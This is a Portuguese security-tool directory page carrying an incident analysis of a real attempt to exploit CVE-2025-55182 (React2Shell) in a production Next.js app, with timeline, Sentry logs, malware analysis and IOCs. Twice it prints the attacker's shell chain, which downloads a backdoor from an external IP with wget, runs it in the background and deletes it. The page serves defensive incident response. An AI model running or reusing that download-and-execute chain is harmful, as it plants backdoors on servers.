Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Attack-Analysis — Análise de ataque no mundo real do CVE-2025-55182 (React2Shell) - vulnerabilidade RCE do React Server Components | Kitploit
Ferramentas/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesAnálise ForenseSegurança WebAnálise de MalwareInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Análise de ataque no mundo real do CVE-2025-55182 (React2Shell) - vulnerabilidade RCE do React Server Components

Ver Repositório
16há 9 mesesAinda não revisado
Compartilhar

Análise do Ataque CVE-2025-55182: RCE em React Server Components

Análise de ataque real em uma aplicação Next.js de produção

📋 Sumário

  • Resumo Executivo
  • Visão Geral da Vulnerabilidade
  • Linha do Tempo do Ataque
  • Análise Técnica
  • Análise do Malware
  • Indicadores de Comprometimento (IOCs)
  • Mitigação e Resposta
  • Lições Aprendidas
  • Referências

Resumo Executivo

Em 5 de dezembro de 2025, nossa aplicação Next.js de produção foi alvo de atacantes que exploraram a CVE-2025-55182 (React2Shell), uma vulnerabilidade crítica de Execução Remota de Código nos React Server Components. O ataque tentou baixar e executar um trojan backdoor Linux em nosso servidor.

AtributoValor
ID CVECVE-2025-55182
Pontuação CVSS9.8 (Crítica)
Data do Ataque5 de dezembro de 2025
Resultado do Ataque✅ Bloqueado (pós-correção)
Tipo de MalwareTrojan Backdoor Linux
Stack AfetadaNext.js + React Server Components

Visão Geral da Vulnerabilidade

O que é CVE-2025-55182?

A CVE-2025-55182, também conhecida como "React2Shell", é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta os React Server Components (RSC) em:

  • React: versões 19.0.0 - 19.2.1
  • Next.js: versões 15.x e 16.x (antes das correções)

Causa Raiz

A vulnerabilidade existe na função renderToReadableStream() dentro do Flight Server do React. Ao processar payloads RSC especialmente criados, o servidor não consegue sanitizar adequadamente determinadas entradas, levando à execução arbitrária de código.

Vetor de Ataque

Atacante → Payload RSC Malicioso → Flight Server → eval() → RCE

O atacante envia uma requisição POST com um payload serializado malicioso que é desserializado e executado no servidor.


Linha do Tempo do Ataque

Fase 1: Tentativas Iniciais de Exploração (Pré-correção)

Timestamp (UTC)Evento
Dec 5, 06:20Primeiro ataque detectado via Sentry
Dec 5, 06:20Payload tenta executar comandos shell
Dec 5, 06:20Ataque parcialmente bem-sucedido (pré-correção)

Log de Erro do Sentry (Pré-correção):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Fase 2: Implantação da Correção

TimestampAção
Dec 4, 14:13Atualizado para Next.js 16.0.7
Dec 4, 14:13Versão corrigida implantada (v1.0.0-beta-4)

Fase 3: Ataque Pós-correção Bloqueado

Timestamp (UTC)Evento
Dec 5, 08:48Tentativa de ataque detectada
Dec 5, 08:48Execução do payload BLOQUEADA
Dec 5, 08:48Erro: syntax error: unexpected ";"

Log de Erro do Sentry (Pós-correção):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

A correção impediu com sucesso a execução do comando malicioso.


Análise Técnica

Detalhes da Requisição de Ataque

AtributoValor
URL Alvohttps://[REDACTED]/
MétodoPOST
User-AgentPython Requests 2.31
OrigemScript de ataque automatizado

Análise do Payload

O atacante tentou executar a seguinte cadeia de comandos:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Detalhamento:

EtapaComandoFinalidade
1wget http://45.76.155.14/vim -O /tmp/vimBaixar malware
2chmod +x /tmp/vimTornar executável
3nohup /tmp/vim > /dev/null 2>&1 &Executar em segundo plano, persistir após logout
4rm -f /tmp/vimApagar evidências

Ambiente do Servidor

ComponenteVersão
Sistema OperacionalAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (corrigido)
ContainerDocker

Análise do Malware

Informações do Arquivo

AtributoValor
Nome do arquivovim (disfarçado de ferramenta legítima)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Tipo de arquivoELF 64-bit LSB executable, x86-64
LinguagemGo (binário compilado)
Tamanho do arquivo~4.7 MB

Resultados do VirusTotal

Taxa de Detecção: 13/72 (18%)

FornecedorNome de Detecção
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

Link do VirusTotal: Ver Análise

Análise do Binário

ELF Header:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Capacidades Identificadas:

CapacidadeEvidência
Cliente HTTP/HTTPSnet/http, *http.Client
Criptografia TLScrypto/tls, crypto/aes
Proxy SOCKS5socks, socks5
Resolução de DNSnet/dns/dnsmessage
Criptografia Fortechacha20poly1305, Ed25519

Strings Extraídas (Relevantes):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Regras IDS Acionadas

SeveridadeRegraFonte
BAIXAET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
BAIXAET DNS Query for .cc TLDProofpoint ET Open

Classificação do Malware

Tipo: Trojan Backdoor Linux

Capacidades:

  • Acesso remoto a shell
  • Comunicação com Command & Control (C2)
  • Upload/download de arquivos
  • Comunicações criptografadas
  • Tunelamento de tráfego via SOCKS5
  • Mecanismos de persistência

Indicadores de Comprometimento (IOCs)

IOCs de Rede

TipoValorDescrição
Endereço IP45.76.155.14Servidor de distribuição do malware
URLhttp://45.76.155.14/vimURL de download do malware
HospedagemVultr VPSProvedor de nuvem
TLD.ccDomínio do C2 usa TLD .cc

IOCs de Arquivo

TipoValor
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calcular se necessário]
MD5[Calcular se necessário]
Nome do arquivovim (disfarçado)
Tipo de arquivoELF 64-bit x86-64
Tamanho do arquivo~4.7 MB

IOCs Comportamentais

IndicadorDescrição
wget para IP externoDownloads de URLs não padronizadas
Arquivos em /tmp/Executável suspeito no diretório temporário
nohup + execução em segundo planoTentativa de persistência
Exclusão imediata de arquivoLimpeza de evidências
User-Agent Python RequestsFerramenta de ataque automatizada

Regra YARA

Baixar ferramenta